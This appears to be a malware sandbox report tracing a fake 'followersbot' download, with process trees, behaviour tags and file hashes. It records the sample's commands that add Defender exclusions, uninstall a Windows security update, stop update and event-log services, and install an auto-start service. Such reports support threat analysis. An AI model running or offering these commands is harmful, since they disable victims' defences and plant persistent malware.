C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5064 /prefetch:83⤵PID:3404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:83⤵PID:4056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:4020 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x27c,0x280,0x284,0x120,0x288,0x7ff645495460,0x7ff645495470,0x7ff6454954804⤵PID:3196
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:13⤵PID:2848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:13⤵PID:376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:13⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4968 /prefetch:83⤵PID:1220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:13⤵PID:976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6736 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5060 /prefetch:23⤵PID:3652
-
-
-
  C:\Program Files\7-Zip\7zG.exe
    Command: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\followersbot\" -ad -an -ai#7zMap30093:86:7zEvent16032
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5604
  C:\Windows\system32\cmd.exe
    Command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "
    PID:5800
    C:\Windows\System32\Conhost.exe
      Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:5856
    C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
      Command: "C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      PID:5904
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:6108
      C:\Windows\system32\cmd.exe
        Command: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        PID:5420
        C:\Windows\system32\wusa.exe
          Command: wusa /uninstall /kb:890830 /quiet /norestart
          PID:968
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe stop UsoSvc
        - Launches sc.exe
        PID:5432
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe stop WaaSMedicSvc
        - Launches sc.exe
        PID:4684
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe stop wuauserv
        - Launches sc.exe
        PID:4520
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe stop bits
        - Launches sc.exe
        PID:5196
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe stop dosvc
        - Launches sc.exe
        PID:4492
      C:\Windows\system32\dialer.exe
        Command: C:\Windows\system32\dialer.exe
        PID:5532
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe delete "HIUOFKBL"
        - Launches sc.exe
        PID:648
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe create "HIUOFKBL" binpath= "C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe" start= "auto"
        - Launches sc.exe
        PID:5160
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe stop eventlog
        - Launches sc.exe
        PID:2888
      C:\Windows\system32\sc.exe
        Command: C:\Windows\system32\sc.exe start "HIUOFKBL"
        - Launches sc.exe
        PID:2664
    C:\Windows\system32\timeout.exe
      Command: timeout /t 5 /nobreak
      - Delays execution with timeout.exe
      PID:3564
    C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
      Command: "C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
      - Loads dropped DLL
      PID:6028
      C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
        Command: "C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SetWindowsHookEx
        PID:2408
  C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
    Command: "C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"
    - Executes dropped EXE
    PID:6088
  C:\Windows\system32\NOTEPAD.EXE
    Command: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
    - Opens file in notepad (likely ransom note)
    PID:240
  C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
    Command: "C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
    - Executes dropped EXE
    PID:5276
    C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
      Command: "C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      PID:5816
  C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
    Command: "C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    PID:5708
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Command and Scripting Interpreter: PowerShell
      PID:4788
      C:\Windows\System32\Conhost.exe
        Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        PID:6724
    C:\Windows\system32\cmd.exe
      Command: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      PID:1200
      C:\Windows\system32\wusa.exe
        Command: wusa /uninstall /kb:890830 /quiet /norestart
        PID:3008
    C:\Windows\system32\sc.exe
      Command: C:\Windows\system32\sc.exe stop UsoSvc
      - Launches sc.exe
      PID:5032
    C:\Windows\system32\sc.exe
      Command: C:\Windows\system32\sc.exe stop WaaSMedicSvc
      - Launches sc.exe
      PID:1168
    C:\Windows\system32\sc.exe
      Command: C:\Windows\system32\sc.exe stop wuauserv
      - Launches sc.exe
      PID:3524
    C:\Windows\system32\sc.exe
      Command: C:\Windows\system32\sc.exe stop bits
      - Launches sc.exe
      PID:704
    C:\Windows\system32\sc.exe
      Command: C:\Windows\system32\sc.exe stop dosvc
      - Launches sc.exe
      PID:5152
      C:\Windows\System32\Conhost.exe
        Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        PID:6484
    C:\Windows\system32\dialer.exe
      Command: C:\Windows\system32\dialer.exe
      PID:6472
    C:\Windows\system32\sc.exe
      Command: C:\Windows\system32\sc.exe stop eventlog
      - Launches sc.exe
      PID:6648
    C:\Windows\system32\sc.exe
      Command: C:\Windows\system32\sc.exe start "HIUOFKBL"
      - Launches sc.exe
      PID:6972
      C:\Windows\System32\Conhost.exe
        Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        PID:6580
  C:\Windows\system32\cmd.exe
    Command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "
    PID:588
    C:\Windows\System32\Conhost.exe
      Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:6244
    C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
      Command: "C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"
      - Executes dropped EXE
      PID:1788
    C:\Windows\system32\timeout.exe
      Command: timeout /t 5 /nobreak
      - Delays execution with timeout.exe
      PID:2368
    C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
      Command: "C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
      - Executes dropped EXE
      PID:7144
      C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
        Command: "C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SetWindowsHookEx
        PID:4924
  C:\Windows\system32\NOTEPAD.EXE
    Command: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
    - Opens file in notepad (likely ransom note)
    PID:4436
  C:\Windows\system32\NOTEPAD.EXE
    Command: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
    - Opens file in notepad (likely ransom note)
    PID:7064
  C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
    Command: "C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
    - Executes dropped EXE
    PID:5688
    C:\Windows\system32\WerFault.exe
      Command: C:\Windows\system32\WerFault.exe -u -p 5688 -s 280
      - Checks processor information in registry
      - Enumerates system info in registry
      PID:2448
  C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
    Command: "C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
    - Executes dropped EXE
    PID:4376
    C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
      Command: "C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow
      PID:1072
  C:\Windows\system32\NOTEPAD.EXE
    Command: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
    - Opens file in notepad (likely ransom note)
    PID:1736
C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  PID:3644
C:\Windows\System32\RuntimeBroker.exe
  Command: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:3956
C:\Windows\System32\RuntimeBroker.exe
  Command: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious use of UnmapMainImage
  PID:2536
C:\Windows\system32\DllHost.exe
  Command: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:4352
C:\Windows\System32\RuntimeBroker.exe
  Command: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious use of UnmapMainImage
  PID:3716
C:\Windows\System32\svchost.exe
  Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  PID:4324
C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS
  PID:64
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  Command: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Modifies data under HKEY_USERS
  PID:4696
C:\Windows\system32\SppExtComObj.exe
  Command: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID:2496
C:\Windows\System32\svchost.exe
  Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  PID:4708
C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  PID:4140
C:\Windows\system32\DllHost.exe
  Command: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:4132
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
  Command: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
  PID:2764
C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  PID:1528
C:\Windows\System32\RuntimeBroker.exe
  Command: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:912
C:\Windows\System32\CompPkgSrv.exe
  Command: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID:4964
C:\Windows\System32\CompPkgSrv.exe
  Command: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID:4020
C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  PID:596
C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
  PID:2988
C:\Windows\system32\OpenWith.exe
  Command: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:752
C:\Windows\system32\OpenWith.exe
  Command: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3616
C:\Windows\system32\OpenWith.exe
  Command: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:4988
C:\Windows\system32\DllHost.exe
  Command: C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
  PID:1304
C:\Windows\system32\wbem\wmiprvse.exe
  Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Checks processor information in registry
  PID:5316
C:\Windows\System32\rundll32.exe
  Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID:5532
C:\Windows\System32\smartscreen.exe
  Command: C:\Windows\System32\smartscreen.exe -Embedding
  PID:5748
C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
  PID:5808
C:\Windows\system32\wbem\wmiprvse.exe
  Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  PID:4456
C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
  Command: C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:2356
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5696
  C:\Windows\system32\cmd.exe
    Command: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    PID:2808
    C:\Windows\system32\wusa.exe
      Command: wusa /uninstall /kb:890830 /quiet /norestart
      PID:5744
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop UsoSvc
    - Launches sc.exe
    PID:5920
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    - Launches sc.exe
    PID:3052
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop wuauserv
    - Launches sc.exe
    PID:3632
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop bits
    - Launches sc.exe
    PID:5984
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop dosvc
    - Launches sc.exe
    PID:6028
  C:\Windows\system32\dialer.exe
    Command: C:\Windows\system32\dialer.exe
    PID:6048
  C:\Windows\system32\dialer.exe
    Command: C:\Windows\system32\dialer.exe
    PID:6104
  C:\Windows\system32\dialer.exe
    Command: dialer.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:760
C:\Windows\system32\wbem\wmiprvse.exe
  Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  PID:5172
C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
  Command: C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  PID:6592
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:2092
    C:\Windows\System32\Conhost.exe
      Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:5420
  C:\Windows\system32\cmd.exe
    Command: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    PID:4092
    C:\Windows\System32\Conhost.exe
      Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:5980
    C:\Windows\system32\wusa.exe
      Command: wusa /uninstall /kb:890830 /quiet /norestart
      PID:6412
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop UsoSvc
    - Launches sc.exe
    PID:5944
    C:\Windows\System32\Conhost.exe
      Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:5964
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    - Launches sc.exe
    PID:6464
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop wuauserv
    - Launches sc.exe
    PID:880
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop bits
    - Launches sc.exe
    PID:4988
    C:\Windows\System32\Conhost.exe
      Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:2664
  C:\Windows\system32\sc.exe
    Command: C:\Windows\system32\sc.exe stop dosvc
    - Launches sc.exe
    PID:5604
  C:\Windows\system32\dialer.exe
    Command: C:\Windows\system32\dialer.exe
    PID:6268
C:\Windows\System32\svchost.exe
  Command: C:\Windows\System32\svchost.exe -k WerSvcGroup
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:3464
  C:\Windows\system32\WerFault.exe
    Command: C:\Windows\system32\WerFault.exe -pss -s 480 -p 5688 -ip 5688
    PID:5044
Downloads
-
Filesize
4.2MB
MD5e9c0fbc99d19eeedad137557f4a0ab21
SHA18945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf
SHA2565783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5
SHA51274e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b
-
Filesize
673KB
MD5020b1a47ce0b55ac69a023ed4b62e3f9
SHA1aa2a0e793f97ca60a38e92c01825a22936628038
SHA256863a72a5c93eebaa223834bc6482e5465379a095a3a3b34b0ad44dc7b3666112
SHA512b131e07de24d90a3c35c6fa2957b4fe72d62b1434c3941ad5140fb1323aacba0ec41732dac4f524dc2f492b98868b54adc97b4200aa03ff2ba17dd60baea5a70
-
Filesize
143KB
MD5bd1ee0e25a364323faa252eee25081b5
SHA17dea28e7588142d395f6b8d61c8b46104ff9f090
SHA25655969e688ad11361b22a5cfee339645f243c3505d2963f0917ac05c91c2d6814
SHA512d9456b7b45151614c6587cee54d17261a849e7950049c78f2948d93a9c7446b682e553e2d8d094c91926dd9cbaa2499b1687a9128aec38b969e95e43657c7a54
-
Filesize
26KB
MD5994a6348f53ceea82b540e2a35ca1312
SHA18d764190ed81fd29b554122c8d3ae6bf857e6e29
SHA256149427a8d58373351955ee01a1d35b5ab7e4c6ac1a312daa9ba8c72b7e5ac8a4
SHA512b3dfb4672f439fa43e29e5b1ababca74f6d53ea4bad39dfe91f59382e23dbb2a3aea2add544892e3fcd83e3c5357ee7f09fe8ab828571876f68d76f1b1fcee2f
-
Filesize
1.8MB
MD575909678c6a79ca2ca780a1ceb00232e
SHA139ddbeb1c288335abe910a5011d7034345425f7d
SHA256fbfd065f861ec0a90dd513bc209c56bbc23c54d2839964a0ec2df95848af7860
SHA51291689413826d3b2e13fc7f579a71b676547bc4c06d2bb100b4168def12ab09b65359d1612b31a15d21cb55147bbab4934e6711351a0440c1533fb94fe53313bf
-
Filesize
1KB
MD5e9117326c06fee02c478027cb625c7d8
SHA12ed4092d573289925a5b71625cf43cc82b901daf
SHA256741859cf238c3a63bbb20ec6ed51e46451372bb221cfff438297d261d0561c2e
SHA512d0a39bc41adc32f2f20b1a0ebad33bf48dfa6ed5cc1d8f92700cdd431db6c794c09d9f08bb5709b394acf54116c3a1e060e2abcc6b503e1501f8364d3eebcd52
-
Filesize
1.5MB
MD54b6270a72579b38c1cc83f240fb08360
SHA11a161a014f57fe8aa2fadaab7bc4f9faaac368de
SHA256cd2f60075064dfc2e65c88b239a970cb4bd07cb3eec7cc26fb1bf978d4356b08
SHA5120c81434d8c205892bba8a4c93ff8fc011fb8cfb72cfec172cf69093651b86fd9837050bd0636315840290b28af83e557f2205a03e5c344239356874fce0c72b9
-
Filesize
136KB
MD5fc7b3937aa735000ef549519425ce2c9
SHA1e51a78b7795446a10ed10bdcab0d924a6073278d
SHA256a6949ead059c6248969da1007ea7807dcf69a4148c51ea3bc99c15ee0bc4d308
SHA5128840ff267bf216a0be8e1cae0daac3ff01411f9afc18b1f73ba71be8ba70a873a7e198fd7d5df98f7ca8eee9a94eab196f138a7f9f37d35c51118f81860afb7d
-
Filesize
84KB
MD5c5aa0d11439e0f7682dae39445f5dab4
SHA173a6d55b894e89a7d4cb1cd3ccff82665c303d5c
SHA2561700af47dc012a48cec89cf1dfae6d1d0d2f40ed731eff6ca55296a055a11c00
SHA512eee6058bd214c59bcc11e6de7265da2721c119cc9261cfd755a98e270ff74d2d73e3e711aa01a0e3414c46d82e291ef0df2ad6c65ca477c888426d5a1d2a3bc5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5e07a48a67f1d3574c4fe4b0cb48e457b
SHA13897cf01e90a8460b38585d978601eb19350484b
SHA256c38abf357108c7e44a4db8b47d522b2decdbd2489fb914969864a1620161cd6a
SHA512fee7fa2d6cc5a0d569cbd31d0d131e903363eb8da36b22492b932725ec9a3f28f20298cc8c999f29a6d0891c085cfbe1f21550f536742d58b202ae21f9044ec8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5790a026f721ef1f9cd064365f2669ef0
SHA1dbfce4d68bb936cab00e67bac62c8c3a56db4304
SHA256278329f09bbf2898548cb01ab8ea4f156187f7bcfd5098224048f73324c31926
SHA5121de9c6fd333d4b4c854919a517d80d3253c946c718e9fe684cb746da692e73e48258fa15437437fc2d02f0a7970f745b0e4c7f0d84e54b6b50fe15e15df20f14
-
Filesize
20.4MB
MD5c814222224a59b504d14638e5e7b6db1
SHA19c4abc0101a9b1550d473ec3e1c2283b6d9dc6c2
SHA2565dc2f1140e1e51fd9ab9fac58d7a8f769b64035d730f359dd7f538b8d00f2e42
SHA512302382418b2e43add39e7be14f5ef70fc9313337b95a17eee6b368abd08756627875b75a0140e3ab7bdf2d6ac45f34ede07c87e3b7fb9b93275327fe8222aa78
-
Filesize
2.7MB
MD524220a523e23833de9f004e547b96699
SHA1f6f2d8973f57d216949962499c1ef1c85f21a1cb
SHA256cc15d14f848e1fc20855f75d6bd07b3c1e2f9bc6d0e4d28833312358e5ac9d78
SHA512e5652171b5f850c80672fdb3e3390a84f7388ace67c412072800bff57191e1816834c63e0263a12e1c9b91243ea3fefe416d4bde690a9ea9d43fb1bf83339b7f
-
Filesize
18.6MB
MD5b91f955810b958a7f434fbc0d443c31f
SHA1b2a89e5b6f75d48378f157fcd4be0d3da124e07b
SHA25695f22f8d46189918f352d72345fcb79ade23209f547cdaaf61b3fda15e3a0930
